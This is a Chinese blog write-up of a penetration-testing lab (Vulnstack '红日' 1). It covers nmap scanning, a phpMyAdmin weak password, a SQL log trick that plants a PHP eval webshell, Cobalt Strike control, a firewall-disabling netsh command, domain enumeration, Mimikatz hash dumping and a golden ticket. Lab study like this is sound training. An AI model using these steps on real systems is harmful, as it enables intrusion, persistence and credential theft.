红日靶场(通关笔记)

已于 2024-09-05 21:41:06 修改
阅读量634 收藏 27
点赞数 23
文章标签: 笔记
于 2024-08-30 23:13:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/awonderfulrty/article/details/141198812
版权

第一步,信息收集

1扫描网段,端口

法1:1.搜索主机,使用netdiscover
netdiscover -i eth0 -r 192.168.0.0/24

通过php探针发现192.168.29.131存在

 

在底端发现3306端口服务

(注意:kali中netdiscover的使用需要root身份。

切换root身份:su root

设置详见【kali】如何进入root用户_kali root-CSDN博客

2.nmap扫描端口

nmap -v 192.168.29.131
┌──(root㉿localhost)-[/home/kali]
└─# nmap -v 192.168.29.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-14 17:51 CST
Initiating ARP Ping Scan at 17:51
Scanning 192.168.29.131 [1 port]
Completed ARP Ping Scan at 17:51, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:51
Completed Parallel DNS resolution of 1 host. at 17:51, 2.06s elapsed
Initiating SYN Stealth Scan at 17:51
Scanning 192.168.29.131 [1000 ports]
Discovered open port 80/tcp on 192.168.29.131
Discovered open port 1025/tcp on 192.168.29.131
Discovered open port 445/tcp on 192.168.29.131
Discovered open port 3306/tcp on 192.168.29.131
Discovered open port 1029/tcp on 192.168.29.131
Discovered open port 135/tcp on 192.168.29.131
Discovered open port 139/tcp on 192.168.29.131
Discovered open port 1027/tcp on 192.168.29.131
Discovered open port 1030/tcp on 192.168.29.131
Discovered open port 1026/tcp on 192.168.29.131
Discovered open port 1028/tcp on 192.168.29.131
Completed SYN Stealth Scan at 17:51, 1.59s elapsed (1000 total ports)
Nmap scan report for 192.168.29.131
Host is up (0.0014s latency).
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1027/tcp open  IIS
1028/tcp open  unknown
1029/tcp open  ms-lsa
1030/tcp open  iad1
3306/tcp open  mysql
MAC Address: 00:0C:29:BF:5A:70 (VMware)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 4.02 seconds
           Raw packets sent: 1010 (44.424KB) | Rcvd: 1001 (40.072KB)

 发现开放端口80(http)  3306(mysql)

法2:直接使用nmap检测29网段,开放端口
nmap -PO 192.168.29.0/24
Nmap scan report for 192.168.29.2
Host is up (0.00041s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:E6:28:AA (VMware)

Nmap scan report for 192.168.29.131
Host is up (0.0012s latency).
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1027/tcp open  IIS
1028/tcp open  unknown
1029/tcp open  ms-lsa
1030/tcp open  iad1
3306/tcp open  mysql
MAC Address: 00:0C:29:BF:5A:70 (VMware)

Nmap scan report for 192.168.29.254
Host is up (0.0011s latency).
All 1000 scanned ports on 192.168.29.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:EF:87:0E (VMware)

Nmap scan report for 192.168.29.130
Host is up (0.0000080s latency).
All 1000 scanned ports on 192.168.29.130 are in ignored states.
Not shown: 1000 closed tcp ports (reset)

Nmap done: 256 IP addresses (5 hosts up) scanned in 110.89 seconds

2目录扫描(dirb)

dirb使用

-a     设置user-agent
-p     <proxy[:port]>设置代理
-c     设置cookie
-z     添加毫秒延迟,避免洪水攻击
-o     输出结果
-X     在每个字典的后面添加一个后缀
-H     添加请求头
-i     不区分大小写搜索

dirb http://192.168.29.131/

得到子目录:http://192.168.29.131/phpMyAdmin/

这里发现弱口令漏洞(root:root)

3.这里登陆后,通过sql语句注入shell语句,用蚁剑连接,

sql语句注入shell语句过程:

SHOW VARIABLES LIKE '%general%'                       //查看日志信息

 SET GLOBAL general_log='on';                                    //开启日志

set global general_log_file = 'C:/phpStudy/WWW/hack.php'                   //设置日志路径

SELECT '<?php @eval($_POST["cmd"]);?>'                                             //写入shell

这里注意:url地址是写入shell的目录!! 

否则连接失败

右键操作:终端,文件浏览......

这一步完成之后,即获取了权限,接下来需要进一步上线控制,采用普遍的内网渗透工具cs或msf(方便操作)来在内网提权,横向.......

4.cs监听

通过蚁剑,完成cs监听

cs(cobalt strike)是一个可以团队合作的渗透平台,分为客户端(可在win和Linux)和服务端(只能在Linux搭建),下图目录

其中cobaltstrike.exe是客户端开启文件,teamserver是服务端开启文件。所以cs文件需要在两台计算机上都存在。

使用时,要先开启服务端(kali机上)

1.     打开cs的目录

2.     切换root

3.     ./teamserver ip地址 连接密码

如下图,cs服务端已成功开启

 然后在本机上打开客户端

直接点击cobaltstrike.exe

服务端ip,端口,名字(随意),连接密码

cs使用:

1.建立监听

 

使用参考: (命令汉译,简单使用.....)

 Cobalt Strike汉化版——安装与使用教程_kali安装cobaltstrike4_cobaltstrike安装教程-CSDN博客

 值得一提的是,cs监听到目标机器有两种方法

1.上传exe文件

2. 上传web攻击

 cs监听成功后,上方出现目标机

关闭防火墙

 shell netsh advfirewall set allprofiles state off   

内网信息收集

cs使用前加shell

ipconfig                 #查看网络                                                                    
net view                 # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net view /domain         # 查看有几个域
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器主机名(可能有多台)

值得一提的是,我分别在蚁剑和cs里收集信息,发现在cs中关于域的信息得到的更多。

net view 得到三台主机名 

 

渗透:

1.提权Access->Elevate

从 Adminstrator*变成system*

2.抓hash,抓明文密码

                                     

3.端口扫描(52段)

 

开放445端口,为了进入内网(52网段),创建SMB监听隧道 

 

通过隧道检查内网(52网段) 得到其他台主机IP,操作如下,结果黑框

这样得到其他攻击对象(主机) 

横向移动 

 贴一张别人的图片(不想弄了)

 横向成功!(这里由于我是分两次完成的笔记,所以IP地址有小小的变化,kali:192.168.29.129...)

最后,完成黄金票据(相当于留后门)

通过抓取Mimikatz,hash,记录SID,Domain,hash得到黄金票据

 

最后清理痕迹,(cs的利用到此为止)

再补充msf,,,,再写一篇补充红日靶场吧,不太全,太多了。

参考文章: 

红日靶场渗透测试——红日靶场1(详细笔记)-CSDN博客

Vulnstack 红日安全内网靶场[一] - 1vxyz - 博客园 (cnblogs.com)

awonderfulrty
关注
渗透系列:红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记(拿下win2008s)
weixin_54626591的博客
01-18 228
红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记(拿下win2008s)
红日靶场七教程,不看后悔!
weixin_45885440的博客
10-11 1908
主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习
红队攻防知识分享-红日安全团队靶场1-速通版
beirry的博客
04-14 3066
此版本是根据日常实战中来渗透攻击,如果为了学习,建议先看学习版本 外网打点 端口扫描 通过扫描端口得知web站点开启 目录扫描 得到用的数据库是mysql和一个站点的备份文件 通过文件包拼接得到站点url:http://192.168.54.128/yxcms,使用的cms是yxcms,版本为1.2.1 知道yxcms,直接百度找已知漏洞 访问站点后台,尝试默认密码admin,123456 通过百度得知,编辑前台模板的功能可以插入一句话木马,则直接拿webshell, 获取路径,直接在备份包里搜索前台
ATT&CK 红日2靶机渗透攻略
weixin_47311099的博客
01-27 5914
环境准备 红日靶场一下载地址 :http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 靶机通用密码:1qaz@WSX dc:win2012 web:win2008 初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去,并且登进去后启动C:\Oracle\Middleware\user_projects\domains\base_domain\startWebLogic.bat 启动时需要管理员身份(administ
Vulnstack红日安全内网域渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
红日靶场1实战经验
YouthBelief的博客
10-27 1万+
红日靶场一0x00前言0x01环境搭建0x02web渗透1 信息收集1.1探测内网存活1.2端口扫描1.2.1 masscan扫描1.2.2 nmap扫描1.2.3 访问80端口1.2.4 目录爆破 看还存在扫描页面服务漏洞利用思路2 漏洞利用2.1 探测phpmyadmin页面2.1 phpmyadmin漏洞利用2.1.1 看是否可以写入文件2.1.2 尝试用日志写入木马getshell2.1.3 蚁剑连接3 拿下webshell后信息收集3.1 是否存在域3.2 网络连接情况 进程 杀软 服务 是否可以
红日靶场1
woshicainiao666的博客
01-13 1629
我们可以看到使用kiwi模块,爆不出密码,是因为kiwi默认是32位的系统,而win7是64位的系统,不兼容,所以我们需要将meterpreter模块迁移到64位的进程中。net config workstation ---------查看当前的域的信息。net view /domain ---------查看本机的域。第一个网卡选择------VMwear1(仅主机模式)net time /domain ----------查找域控。net view ---------查看当前域中计算机的名称。
红日靶场2
weixin_48169878的博客
07-10 4859
1、初始密码为1qaz@WSX,注意WEB这台机器,需要切换用户为de1ay,密码为1qaz@WSX登入2、修改网卡,如PC 、WEB 拥有俩个网卡,则网卡一设置为nat,也可以是主机模式,但由于学校校园网认证方面的问题,主机模式无法上网,所以我用nat模式。对应的把nat模式的网段修改为192.168.111.0设置一个lan区段,所有主机都加入到这个lan区段结果如下:3、然后利用kail或者windows10作为攻击机。为了方便,可以用三台。包括虚拟机kail,虚拟机windows10以及本机。主要是
红日靶场
weixin_44339234的博客
07-11 1454
新手学习记录,有误之处多多指点
红日靶场1(渗透记录)
b1n的博客
09-12 1407
分享的靶机实战环境,这篇博客是为自己记录的同时分享出来让大佬们共同检阅,如有问题,还请多多指教。
红日靶场(一)
weixin_55554070的博客
03-01 5940
一、环境配置 1.靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 2.环境IP配置: kali:net模式(外网):192.168.159.131 win7: VMnet1(内网):192.168.52.143 net模式(外网):192.168.159.136 3.测试连通性: win7能ping通所有主机,所有主机都ping不通win7,因为win7的防火墙过滤了icmp 4.开启web服务 在win7上使用phpst
红日靶场实战一 - 学习笔记
最新发布
m0_64481831的博客
06-18 1202
最近在学习红蓝对抗,如果有兴趣的可以多关注。
红日靶场(1)
Barlow_121212的博客
05-14 482
8.发现具有445端口,使用MSF17_010模块添加用户,并添加到管理员用户。5.查看当前用户权限为administrators,使用CS上线。2. 测试mysql数据库连接密码,并进入phpmyadmin。7.发现其他网段,扫描网段主机,创建代理。4.通过日志写shell,并用蚁剑连接。10.探测域控主机是否开启445端口。3.尝试导入一句话木马,发现拒绝导入。利用方法如法炮制,不在复现。7.使用nmap扫描端口,6.CS 和MSF联合。9.通过远程桌面连接。
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记
ierciyuan的博客
08-01 1万+
内网渗透实战攻打红日靶场第一关,包括环境配置、信息收集、漏洞利用、内网信息收集、内网攻击、横向移动等操作。
红日靶场渗透测试——红日靶场1(详细笔记
qq_52849046的博客
05-24 5539
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅学习使用,切勿用于实战,容易被gangan
ATT&CK 红日1靶机渗透攻略
weixin_47311099的博客
01-27 1980
环境 此实战靶场共 3 台主机,Win7 作为 Web 服务器,是打入此实战靶场的第一个目标和 入手点,Win2K3 为内网域成员主机,WinSever 2008 R2 为内网域控主机。 下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 环境调试 网卡桥接 主机 网卡 IP win7(web服务器) 1.VM2 2.NAT 192.168.52.143 and 192.168.8.142 win2003(内网域成员)
红日靶场第一关
红队是青春
11-16 7156
红日靶场第一关 一、环境配置 NET网卡(kali、windows) kali:172.16.12.187 windows:172.16.12.1 靶机win7:172.16.12.127 VMnet2网卡(内网靶机Win2K3、内网靶机Win2008 R2) 内网靶机Win2K3:192.168.52.141 内网靶机Win2008 R2:192.168.52.138 内网靶机win7:192.168.52.163 二、目标 一、环境搭建 1.环境搭建测试 2.信息收集 二、漏洞利用 3.漏洞搜集与利用
【内网攻防实战】红日靶场01(超超超超超超详细!!实操+AI问答,胎教级教程)
weixin_46022776的博客
06-04 5904
问题:解决:日志功能未开启,OFF,执行sql开启ON。
红日靶场下载csdn
08-13
红日靶场是一个很受欢迎的网络安全实验平台,用于学习和锻炼网络攻防技术。由于该平台所提供的安全实验环境包含了许多常见的漏洞和攻击场景,因此在安全爱好者和专业人士中间都非常受欢迎。 要下载红日靶场,首先需要在CSDN(中国软件与技术服务股份有限公司)网站上搜索相关资源。CSDN是中国最大的IT技术社区和资源分享平台,用户可以在其网站上找到各种技术文档、开发工具和学习资源。 在CSDN网站上搜索红日靶场,可以找到一些与红日靶场相关的下载链接。用户可以根据自己的需求选择合适的下载链接,点击下载按钮即可开始下载。 下载过程可能需要一些时间,具体时间取决于网络连接速度和文件大小。一旦下载完成,用户可以根据下载的文件类型进行相应的安装或配置,以确保红日靶场能够正常运行。 如果在CSDN上找不到合适的下载资源,也可以尝试在其他一些技术资源网站或论坛上搜索红日靶场下载链接。同时,用户还可以考虑通过与其他网络安全爱好者或专业人士交流,获得更多关于红日靶场下载的信息和建议。 最后,下载红日靶场后,用户可以通过参与其中的各种实验和挑战,提升自己的网络安全技能,并加深对各种攻防技术的理解和应用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值